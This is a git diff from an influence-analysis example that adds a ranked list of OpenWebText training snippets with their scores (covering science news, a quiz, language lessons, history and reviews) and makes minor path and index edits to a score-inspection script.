isotopes. Since its discovery, SCP-XXXX has been found to not only exist naturally but also be exceedingly abundant in the Earth's atmosphere. + +Special Containment Procedures: Due to its widespread nature, efforts in containing SCP-XXXX are ongoing. Areas with significant human populations are to be regularly surveyed for the presence of SCP-XXXX in the air. If concentrations exceeding 250ppm of SCP-XXXX are confirmed to be present, a large scale execution of procedure-XXXX-gunnister + +Photograph taken by Mr. T█████ shortly before initial containment. Note the presence of SCP-2176-1 + +Item #: SCP-2176 + +Object Class: Euclid + +Special Containment Procedures: SCP-2176 is to be isolated two-hundred-and-fifty (250) metres away from any open ground, and is to be situated one (1) kilometre north-east of its designated site. +================================================================================ +Rank = 86; Score = 1015808.0 +<|begin_of_text|>Almirante Brown Antarctic Base was an Argentine research centre located in Paradise Bay. In 1984 the base was burnt to the ground and abandoned for a period of time. It has since been rebuilt but is now only used in the summer season. + +This is it’s listing at PolarConservation.org – + +History: Named after Admiral Guillermo Brown, the father of the Argentine Navy. Opened on 6th April 1951. + +Location: Proa point, Sanavirón peninsula, Paradise Bay, Danco Coast, San Martin Land – (64°51′ S, 62°54′ W) + +Notes: + +The original station located in Paradise Bay burned down in 1984. The base has been partially rebuilt, but is occupied only in the summer season. + +Science programmes carried out: + +Initially a naval station used for meteorological observations and scientific support. In 1964, the base was transferred to the I.A.A. (Antarctic Institute of Argentine) as a scientific station, mainly for biological research. + +Initially a naval station used for meteorological observations and scientific support. In 1964, the base was transferred to the I.A.A. (Antarctic Institute of Argentine) as a scientific station, mainly for biological research. + +Area and buildings: + +There are nine buildings + +Location: Paradise Bay, Antarctica + +Category: Ghost Town + +Abandoned: 1984<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 87; Score = 1015808.0 +<|begin_of_text|>Temperatures are warming up in the world of astronomy after a team of researchers discovered ice crystals on a comet, suggesting it could be as old as the solar system. + +An international research team discovered the ice in crystalline form on the surface of comet 67P Churyumov-Gerasimenko, Churi for short, indicating that it was formed 4.6 billion years ago — the results of the experiment have been published in the Astrophysical Journal. + +The comet, which is part of the planet Jupiter family, has found to have ice crystals on its surface that could have originated in space before the solar system or the sun was formed in conditions described by scientists as protosolar nebula. + +Hi @ESA_Rosetta! Comet #67P on 05 Mar 16 from a distance of 20km (more at https://t.co/lNzznIHGkw) pic.twitter.com/tyzkA2AS3a — Rosetta OSIRIS (@Rosetta_OSIRIS) 10 March 2016​ + +By analyzing chemicals trapped in the ice on the comet's surface, researchers were able to determine the age of the ice crystals using a mass spectrometer — which is an instrument that can measure the masses and relative concentrations of atoms and molecules. A statement from the French National Center for Scientific Research (CNRS) said: + +"If comets are made of crystalline ice, this means that they must have formed at the same time as the solar system, that than earlier in the interstellar medium." + +Before Life Began + +The discovery of ice crystals on Churi could have implications on future research surrounding how the earth and solar system began life. + +"In October 2014 [the mass spectrometer] first measured amounts of molecular nitrogen (N2), carbon monoxide (CO) and argon (Ar) in Churi's ice," a statement from the French National Centre for Scientific Research (CNRS) said. + +© Flickr / Stuart Rankin Comet Chaser Discovers Oxygen on 67P/ Churyumov-Gerasimenko + +"The data was compared with that from laboratory experiments on amorphous ice, as well as from models describing the composition of gas hydrates, a type of crystalline ice in which water molecules can trap molecules of gas." + +The levels of nitrogen and argon gas in the ice led the researchers to conclude that is had a crystalline structure, suggesting the ice on the surface of the comet could have been formed before the solar system, or even at the same +================================================================================ +Rank = 88; Score = 1015808.0 +<|begin_of_text|>Pokémon Identification Quiz + +— New batch of questions every time — + +1. Sandshrew Omanyte Thundurus Druddigon Unanswered 2. Alakazam Golem Mothim Porygon-Z Unanswered 3. Staraptor Sandslash Braviary Gengar Unanswered 4. Omastar Walrein Scolipede Patrat Unanswered 5. Krookodile Weepinbell Lopunny Chingling Unanswered 6. Dugtrio Nincada Porygon2 Wailord Unanswered 7. Beldum Unfezant Krabby Cradily Unanswered 8. Delibird Bastiodon Gloom Audino Unanswered 9. Chansey Granbull Smoochum Rhydon Unanswered 10. Parasect Tentacruel Chansey Wingull Unanswered 11. Tepig Nidorino Magnemite Arcanine Unanswered 12. Floatzel Cleffa Grotle Cacnea Unanswered 13. Mightyena Mismagius Carvanha Darumaka Unanswered 14. Houndoom Stunfisk Staryu Raichu Unanswered 15. Forretress Dratini Elekid Voltorb Unanswered 16. Deoxys Doduo Serperior Emboar Unanswered 17. Mandibuzz Delcatty Poochyena Nincada Unanswered 18. Abomasnow Blitzle Combusken Machamp Unanswered 19. Grovyle Breloom Spoink Miltank Unanswered 20. Igglybuff Charmander Abomasnow Shiftry Unanswered 21. Manectric Tropius Eevee Arbok Unanswered 22. Gastrodon Luxio Dragonair Sewaddle Unanswered 23. Electrike Doduo Lilligant Pupitar Unanswered 24. Haxorus Sandslash Shelgon Silcoon Unanswered 25. Gabite Drilbur Gothorita Gurdurr Unanswered + +How well do you know your Pokémon? Take the quiz below to find out!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 89; Score = 999424.0 +<|begin_of_text|>One of the two big players in the asteroid mining market, Deep Space Industries, today unveiled its plan to land a 110-pound spacecraft on a near-Earth asteroid by 2020. + +The spacecraft, known as Prospector-1, would study the yet-to-be-selected asteroid to determine the value of its resources for mining. It’ll also put Deep Space Industries’ water-based propulsion system to an interplanetary test. + +“Deep Space Industries has worked diligently to get to this point, and now we can say with confidence that we have the right technology, the right team and the right plan to execute this historic mission,” Rick Tumlinson, DSI’s board chairman and co-founder, said in a news release. + +California-based DSI and its partners in Luxembourg say they’ll launch a precursor satellite called Prospector-X into low Earth orbit next year to test the technologies that would be used for Prospector-1. + +DSI sees near-Earth asteroids as potentially valuable sources for materials ranging from plain old water ice – which can be processed into breathable oxygen and drinkable water as well as propellant – to in-space building materials and precious metals. + +If DSI sticks to its schedule, Prospector-1 could become the first commercial asteroid mining exploration mission. However, Planetary Resources, which is based in Redmond, Wash., is also taking aim at asteroids. + +Planetary Resources had its first precursor spacecraft, Arkyd-3R, deployed into orbit for a five-month test mission last year. A larger spacecraft, the Arkyd-6A, is being readied for launch later this year and will observe Earth in infrared wavelengths as a practice round for asteroid prospecting. + +Planetary Resources says its next-generation space telescopes, known as the Arkyd 100 and Arkyd 200, could start studying the composition of near-Earth asteroids in the 2017-2019 time frame. At the same time, the company plans to create a constellation of Earth-observing satellites known as Ceres. + +If suitable targets are identified, Planetary Resources could begin extracting materials from asteroids by the mid-2020s, according to the company’s president and CEO, Chris Lewicki. + +Planetary Resources has raised tens of millions of dollars since its founding in 2012. Deep Space Industries was founded a year later, and has raised an undisclosed amount of seed money from investors including Metatron Global. Both companies have forged partnerships with Luxembourg’s government as part of that European nation’s SpaceResources.lu initiative +================================================================================ +Rank = 90; Score = 974848.0 +<|begin_of_text|>Descarca + +VIII. Corpul + +A. (Mircea şi Dana) + +– Dana! Unde eşti? + +– Sunt în baie! + +– Ce faci? + +– Mă spăl pe cap! Of, nu mai am prosop aici... Mircea! + +– Da! + +– Te rog, adu un prosop curat din dulap! + +B. + +Alina are şase ani. Ea are o păpuşă. Păpuşa este mare şi se numeşte Rodica. Ea are părul lung şi ochii albaştri. Închide şi deschide ochii. Alina piaptănă păpuşa cu peria. Apoi o îmbracă cu o rochiţă albă. O pune în picioare pe pat şi spune: + +– Acum mergem la şcoală! + +C. (Nicu şi Manuela) + +– Manuela, îţi plac animalele? + +– Da, Nicu. Am o pisică cu blana neagră şi deasă. O lăbuţă este albă, ca şi cum ar avea un pantofior. Uite, acum miaună. Îi este foame. Îi dau mâncare pentru pisici. + +– Ce mustăţi lungi are! Eu am un papagal cu pene verzi. Zboară prin casă. + +D. Exerciţiu recapitulativ + +(două persoane) + +– Mă scuzaţi, unde este o farmacie? + +– Pe aceasta stradă este o staţie de tramvai. Mergeţi cu tramvaiul trei staţii, până la piaţă. Lângă piaţă este farmacia. Dar azi este duminică. Nu este nimeni la farmacie. + +– Această farmacie este închisă duminica? + +– Da. Doar în centru este o farmacie deschisă. Pentru asta, mergeţi cinci staţii cu tramvaiul, apoi mai întrebaţi. + +– Mulţumesc, la revedere! + +– La revedere!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 91; Score = 966656.0 +<|begin_of_text|>This article is about air conditioning. For similar concept in atomic physics, see Evaporative cooling (atomic physics) + +An evaporative cooler (also swamp cooler, swamp box, desert cooler and wet air cooler) is a device that cools air through the evaporation of water. Evaporative cooling differs from typical air conditioning systems, which use vapor-compression or absorption refrigeration cycles. Evaporative cooling uses the fact that water will absorb a relatively large amount of heat in order to evaporate (that is, it has a large enthalpy of vaporization). The temperature of dry air can be dropped significantly through the phase transition of liquid water to water vapor (evaporation). This can cool air using much less energy than refrigeration. In extremely dry climates, evaporative cooling of air has the added benefit of conditioning the air with more moisture for the comfort of building occupants. + +The cooling potential for evaporative cooling is dependent on the wet-bulb depression, the difference between dry-bulb temperature and wet-bulb temperature (see relative humidity). In arid climates, evaporative cooling can reduce energy consumption and total equipment for conditioning as an alternative to compressor-based cooling. In climates not considered arid, indirect evaporative cooling can still take advantage of the evaporative cooling process without increasing humidity. Passive evaporative cooling strategies can offer the same benefits of mechanical evaporative cooling systems without the complexity of equipment and ductwork. + +Overview [ edit ] + +qanat, used for evaporative cooling of buildings Schematic diagram of an ancient Iranian windcatcher and, used for evaporative cooling of buildings + +An earlier form of evaporative cooling, the windcatcher, was first used in ancient Egypt and Persia thousands of years ago in the form of wind shafts on the roof. They caught the wind, passed it over subterranean water in a qanat and discharged the cooled air into the building. Modern Iranians have widely adopted powered evaporative coolers (coolere âbi).[1] + +The evaporative cooler was the subject of numerous US patents in the 20th century; many of these, starting in 1906,[2] suggested or assumed the use of excelsior (wood wool) pads as the elements to bring a large volume of water in contact with moving air to allow evaporation to occur. A typical design, as shown in a 1945 patent, includes a water reservoir (usually with level controlled by a float valve), a pump to circulate water over the excelsior pads and +================================================================================ +Rank = 92; Score = 962560.0 +<|begin_of_text|>Balbir Singh + +kar sevak + +Babri Masjid + +Mohammed Amir + +Masters in History + +Political Science + +Malegaon + +Mecca Masjid + +was awho participated in the razing of the. Today, as, his goal is to repair and rebuild 100 mosques.ByThe talk is of madness. The powerful hold it can take on one, and how the fear caused by the idea of madness can in itself be maddening.Mohammad Amir, physically nondescript, with a triple, and English, and an itinerant pilgrim, should know what he is talking about: Long ago, 25 years to be precise, he had a dalliance with insanity.We are sitting, deep into the night, in the well-carpeted office of one of Amir’s well-wishers in Malegaon. Among those ringed around him are a mechanic, a fruit-vendor, some traders and the loquacious principal of a junior college inwith a penchant for the dramatic and for hijacking the conversation.Earlier that evening, Amir had addressed a gathering at theat Madhavpura. “Woh toh zameen ke neeche ki, aur aasman ke upar ki baate karte hain,” says one of his admiring audience.Meditations on the afterlife — and on the ethics of Islam and social conduct of Muslims — might dominate his talks, but Mohammed Amir is often at the pulpit because of the torturous chrysalis he has emerged from, he now says.Twenty-five years ago he was not Mohammad Amir but a certain Balbir Singh, and the highlight of his life until then was that he was among the handful of kar sevaks who had clambered up the dome of Babri masjid to strike the first blows. The same kar sevaks who were lionised by Bal Thackeray as his men.“I am a Rajput. I was born in a little village close to Panipat,” he discloses. “My father, Daulatram, was a school teacher and a man of deep Gandhian leaning. He had witnessed the horrors of Partition, and went out of his way to make the Muslims in our area feel secure. He had wanted me and my three elder brothers to do the same.”When he was ten, Balbir’s family moved from the village to Panipat so that the children could complete their secondary education. Panipat, he says, was a +================================================================================ +Rank = 93; Score = 958464.0 +<|begin_of_text|>An increase in aridity due to global warming will disturb the balance of nutrients in the soil and reduce productivity of the world’s drylands, which support millions of people, a landmark study predicts. + +A dryland site in Peru that was sampled. Credit: D.Eldridge et al + +An increase in aridity due to global warming will disturb the balance of nutrients in the soil and reduce productivity of the world’s drylands, which support millions of people, a landmark study predicts. + +The research was conducted by a global collaboration of scientists who carried out the same studies of 224 dryland sites in 16 countries on every continent except Antarctica. + +In Australia, woodland sites in NSW near Mildura were studied by UNSW’s Adjunct Professor David Eldridge, of the School of Biological, Earth and Environmental Sciences, who is a member of the international research team. + +Other sites included areas of the Negev Desert in Israel, the Pampas lowlands in Argentina and the Altiplano highlands of Peru. Rainfall at the sites ranged from 100 to 800 mm per year, and all soil samples were analysed in the same laboratory in Spain. + +The research shows that increasing aridity is associated with a reduction in carbon and nitrogen in the soil and an increase in phosphorus. + +The results are published in the journal Nature. + +“Drylands cover about 41 per cent of Earth’s land surface and support more than 38 per cent of the world’s population,” says Professor Eldridge, who also works for the NSW Office of Environment & Heritage. + +“As the world’s population grows, people will increasingly rely on marginal lands – particularly drylands - for production of food, wood and biofuels. But these ecosystems will be severely affected by imbalances in the cycle of carbon, nitrogen and phosphorus.” + +A worldwide decrease in soil moisture ranging from 5-15 per cent has been predicted for the 2080-2099 period. + +Phosphorus in rocks and sediments is released into the soil by weathering, and levels are expected to increase as soils become drier and erode more. + +This increase in phosphorus will be accompanied by reductions in carbon and nitrogen, which are more dependent on biological processes such as litter decomposition, photosynthesis and nitrogen fixation. Reduced plant cover will also exacerbate this effect. + +“Plants need all of these elements, in the correct amounts and at the right times, but increasing aridity will upset this balance, leading to a breakdown in essential soil processes,” says Professor Eldridge. + +The +================================================================================ +Rank = 94; Score = 942080.0 +<|begin_of_text|>When I first came to America in the distant 2003, many things seemed pretty amazing to me. Sadly, the same could not be said about American humor. Despite the fact that I understood English really well even then, I did not find most of the humor funny. I really tried: I watched multiple episodes of SNL (Saturday Night Live), AFV (America’s Funnies Videos), The Tonight Show, South Park, Family Guy, and a bunch of other TV shows. Fast-forward ten years and you will find me enjoying SNL, hysterically laughing at Jim Gaffigan’s “Mr. Universe,” quoting Leno’s jokes, and watching up to 6 episodes of Family Guy back-to-back. + +In other words, it took me several years of living in the US to fully grasp the humor behind what was being said. Once I became familiar with modern American culture, started following current events, and began recognizing public figures, the humor started adding up. + +Generally speaking, a lot of humor is based on association, stereotyping, and cultural referencing. Therefore, in order to find the humor of a particular country or culture funny, you need to know and understand that country or culture fairly well. To help you better understand Russian humor (русский юмор), let me share some thoughts on the subject. Here is a quick Russian video to warm you up 🙂 The title is “American idea of a typical Russian morning.” + +Some thing are universally amusing 🙂 + +Babies making funny faces, dogs chasing their tails, cats fighting their reflection in the mirror – you can expect a similar reaction to things of this nature whether you are in US or Russia. + +I found a couple of jokes online that seem pretty funny in both languages: + +Joke 1 + +К американцу, летящему в самолёте российкой авиакомпании, подходит стюардесса и спрашивает: + +– Желаете отобедать? + +– А какой выбор? + +– Да или нет. + +Joke 1 translated + +An American is taking a flight operated by Russian airlines. The flight attendant comes up to him and asks,“Would you like to eat?” + +“What are the options?” he asks. + +“Yes and no.” + +Joke 2 + +Три пары обедают вместе в ресторане. + +Американец жене: + +– Передай мне мёд, медовая моя! + +Англичанин жене: + +– Передай мне сахар, сахарная моя! + +Русский +================================================================================ +Rank = 95; Score = 937984.0 +<|begin_of_text|>The Mining industry of the Democratic Republic of the Congo is a significant factor in the world's production of cobalt, copper, diamond, tantalum, tin, and gold. It is the Democratic Republic of the Congo's largest source of export income. In 2009, the Democratic Republic of the Congo (DRC) had an estimated $24 trillion in untapped mineral deposits, including the world's largest reserves of coltan and significant quantities of the world's cobalt.[1][2] The United States Geological Survey estimates that the DRC has 1 million tons of lithium resources.[3] + +During the Second Congo War mass-scale looting of mineral assets by all combattant forces—Congolese, Rwandan, Ugandan and foreign civilians—took place. The small artisanal mining operations the fighters were robbing sometimes shut down afterwards and larger foreign businesses reduced operations as well. Following the peace accord in 2003, the focus returned to mining. Rebel groups supplied international corporations through unregulated mining by soldiers, locals organized by military commanders and by foreign nationals. The political framework was unstable. In 2009 the DRC signed a loan contract with the International Monetary Fund (IMF) for $12 billion of debt relief in 2010. The loan included trade conditions, such as liberalization of the diamond trade.[citation needed] At the end of 2012 the IMF suspended the last payments, because of a lack of transparency in the DRC's process for awarding mining contracts. The mining sector has since expanded, but commodity prices have declined and this has hampered the DRC's progress. + +Much mining has been done in small artisanal mining operations, sometimes known as Artisanal and Small-Scale Mining (ASM).[4] These small-scale mines are unregulated,[5] with high levels of child labor and workplace injury. They can occur within protected areas, and around endangered or threatened species. As of 2008 many ASM operations existed for minerals such as coltan.[citation needed] ASM operations employ a significant portion of the DRC's population; estimates range up to one fifth of the population, or 12.5 million people.[5] Problems stemming from artisanal mining include disruption of families, mining-related illnesses, environmental damage, child labor, prostitution and rape.[6][7] + +Mine tailings at a Lubumbashi copper mine. + +History [ edit ] + +Belgian Congo Katanga copper mine + +The history of mining in the Democratic Republic of the Congo begins with the birth of +================================================================================ +Rank = 96; Score = 937984.0 +<|begin_of_text|>Papa Recipe White Flower Clear Up 8% AHA Gel review 1:18 PM Moi Sanom 0 Comments + +1.Blegh 2. Pff 3. Meh 4. Oohh 5. Awwyeah 6. Wooha + +021617712" + +Disclaimer: This post contains affiliated links and codes. That fact does not alter my review or opinion in any matter. For more information read my Disclaimer page. + +On my hunt for Asian acids I came across this little oddity called Papa Recipe while browsing Wishtrend. The packaging looked cute and the ingredients promising, so in the cart it went.At the point it arrived I was all out of my beloved Mandelic acid cream and Johnny Clyde's skin was freaking out because of last years summer weather.This product came just in time for the rescue!Its a viscous transparent liquid that is thicker than water yet quite slippery.It smells just like most fragrance free acids do.Like chemicals and dust.It spreads easily on the skin and sinks in very fast leaving no trace at all.I have tried this both in combination with other acids and with the C20 Vitamin C serum and it plays well with all of them.I saw a reduction of PIH and an evening out of the skin tone while using this.Pores have not been reduced but I did not expect that to happen.It is gentle yet effective. It doesn’t burn on the skin unless you have an open wound.I noticed most of the improvement on Johnny Clyde's skin since he was having issues with spots when using this. For the first month of usage, his spots got reduce to about one every 3 days and his skin evened out noticeably. After he started using this in combination with the COSRX AHA BHA Clarifying Treatment Toner (hop over to see some impressive before and after photos) his skin improved again significantly. I believe that the COSRX toner actually boosted the Papa Recipe Gel while doing its own magic with the pores.Johnny Clyde's skin started looking more flawless by the day and after 3 months of usage his skin looks better than ever before. He hasn’t had a spot in weeks and his PIH are slowly disappearing. This is a wonderful yet effective AHA serum that is not just cheap but also shows great results.If you can’t find the Mandelic Acid cream by Pharmaceris this is the next best thing I have tried.To me it worked just as well as Paulas Choice AHA gel but for a fraction of the price.Definitely a must buy +================================================================================ +Rank = 97; Score = 933888.0 +<|begin_of_text|>It came as a shock to many Syrians that people in the capital Damascus would spend an estimated 18 million Syrian pounds (about 165,000 US dollars) to throw a lavish party inspired by the Turkish soap opera “Harem Al Sultan” (Muhteşem Yüzyıl/The Sultan's Harem) as people in the war-torn country are being killed and starved on a daily basis. + +But one group of wealthy families did just that in November 2013. Photographs of the participants’ dresses, decorations and drinks were widely shared on social networks at the time. Just a few kilometres away from the party, Syrian children in Yarmuk refugee camp were dying of hunger. + +Several websites and news portals in Arabic reported on the fancy dress soiree, such as thawrtalsoryienalahrar, Syria-news, Aksalser, Al-marsd and All4Syria [all ar]. AlSulta AlRabeaa (the Fourth Authority) published photographs of the smiling party-goers on Facebook. + +Syrian artist Jalal Altawil explained the details of the party on his Facebook page: + +آل الدباس في مدينة دمشق تقيم حفلاً تطلق عليه اسم “حريم السلطان” تدعو إليه العائلات الدمشقية العريقة, وتبدو في الصورة شذا المعلم بنت وزير الخارجية السوري, وعائلة الشيخ غزال وآل الحفار, الحفل أُقيم في منتجع يعفور وتكلفته الاجمالية مع تكلفة الالبسة التي تم تصميمها على ايدي ايلي صعب وزهير مراد وتم نقلها من اوروبا الى دمشق بلغت حوالي 18 مليون ليرة سورية. دمشق. يعفور. + +The Dabbas family in the city of Damascus held a ceremony under the theme “Hareem Al Sultan” for famous Damascus families. In this photograph, you can see Shaza Muallem, the daughter of Syrian Foreign Minister Walid Muallem, and the family of Sheikh Ghazal and Hafar family. The ceremony was held in the resort of Yafour – Damascus suburb, and the total price – including the cost of clothes designed by Elie Saab and Zuhair Murad brought over from Europe to Damascus – amounted to about 18 million Syrian pounds. + +The Syrian Observer wrote that “the entertainment ceremony was described by activists as the +================================================================================ +Rank = 98; Score = 925696.0 +<|begin_of_text|>Combattente nella rivoluzione ucraina. Osteggiato tanto dai reazionari “bianchi” quanto dai bolscevichi della rivoluzione russa, ed esponente di primo piano dell’Anarco-comunismo internazionale. + +Di estrazione contadina, le ristrettezze economiche familiari prima e la morte del padre poi, quando aveva solo dieci anni, lo obbligano ad intraprendere le prime esperienze lavorative, facendogli immediatamente scoprire l’ingiustizia sociale imperante nella Russia zarista. A dodici anni lascia la scuola ed inizia a lavorare a tempo pieno come contadino. A tredici anni, per la prima volta nella sua vita, reagisce con estrema violenza alla vista dei soprusi inflitti da un giovane padrone contro un lavoratore. Questa è la sua prima ribellione violenta documentata contro la classe padronale, a dimostrazione del suo carattere indomito, ribelle ed insofferente alle ingiustizie. + +A 16 anni entra a far parte di un gruppo formato da giovani rivoluzionari del luogo che sostenevano apertamente il comunismo libertario e si opponevano attraverso l’azione diretta all’oppressione classista. + +Dopo la pace di Brest-Litovsk, firmata da Lenin il 3 marzo 1918, che cedeva l’Ucraina alla Germania, le truppe germaniche invadono il Paese e lo occupano militarmente. Gli Anarchici si organizzano in un esercito di liberazione partigiano, mentre Makhno e una delegazione si recano nella Russia bolscevica al fine di ottenere la collaborazione e l’aiuto dei compagni Anarchici russi. + +Per contrastare l’invasore tedesco, Makhno forma l’armata Makhnovista, formata da battaglioni di contadini e operai per contrastare l’invasore tedesco. La Germania si ritirerà nel novembre 1918. + +Nello stesso periodo i libertari si trovano a dover affrontare la reazione della borghesia ucraina guidata da Den +================================================================================ +Rank = 99; Score = 913408.0 +<|begin_of_text|>Currently, Mars has a thin atmosphere dominated by carbon dioxide, with pressures at most of the planet's surface so low that liquid water will immediately boil. But a variety of features we've discovered argue that the planet has once supported copious amounts of water, indicating that the planet's atmosphere must have differed considerably in the past. Using radar data from the Mars Reconnaissance Orbiter, scientists have now found a potential resting place for some material that was once in the Martian atmosphere: a huge deposit at the south pole that holds nearly as much CO 2 as the planet's current atmosphere. + +Mars' south pole has extensive ice deposits, but most of that material is thought to be water, with only a thin coating of carbon dioxide on top. However, the MRO's radar instrument identified several reflection-free zones, where most of the radar signal went entirely through the icy material to the planet's surface itself. Based on the authors' calculations, this can't be water ice, but it does have very similar reflective properties to dry ice, or frozen carbon dioxide. The area also has features that indicate that some of the dry ice has sublimated to a gaseous form, resulting in areas where the surface has collapsed. + +If the area is dry ice, then the total amount present is huge. The authors estimate the total volume of the non-reflective material at somewhere between 9,500 and 12,500 cubic kilometers. That's 30 times more than had previously been estimated to reside at the poles, and is about 80 percent of the current CO 2 content of the entire atmosphere. If all the dry ice were heated up, Mars' atmospheric pressure would nearly double. + +Like the Earth, Mars undergoes orbital variations that alter the distribution of sunlight across the planet. One of these involves changes in the orientation of its axis of rotation relative to the plane of its orbit, called the obliquity. Mars undergoes more dramatic changes in obliquity than Earth and, as a result, its poles see more significant changes in sunlight at the extreme. The authors argue that this can help explain why the reflection-free zones lack any material from the planet's famous dust storms, which should reflect the radar effectively. + +Mars' atmosphere needs to be above a certain density to support the particles that make up its dust storms. As the poles undergo extended cold periods, the authors suggest "the atmosphere collapses onto the polar caps." So much of the planet's dry ice winds up frozen at the poles that the atmosphere becomes even thinner than diff --git a/examples/openwebtext/inspect_scores.py b/examples/openwebtext/inspect_scores.py index 8f658ce..d77bb39 100644 --- a/examples/openwebtext/inspect_scores.py +++ b/examples/openwebtext/inspect_scores.py @@ -11,7 +11,10 @@ def main(): - scores = Analyzer.load_file("influence_results/openwebtext/scores_raw/pairwise_scores.safetensors")[ + # scores = Analyzer.load_file("influence_results/openwebtext/scores_raw/pairwise_scores.safetensors")[ + # "all_modules" + # ].float() + scores = Analyzer.load_file("influence_results/scores_raw_margin_scores/pairwise_scores.safetensors")[ "all_modules" ].float() @@ -19,7 +22,7 @@ def main(): eval_dataset = get_custom_dataset() tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME, use_fast=True, trust_remote_code=True) - eval_idx = 5 + eval_idx = 0 sorted_scores = torch.sort(scores[eval_idx], descending=True) top_indices = sorted_scores.indices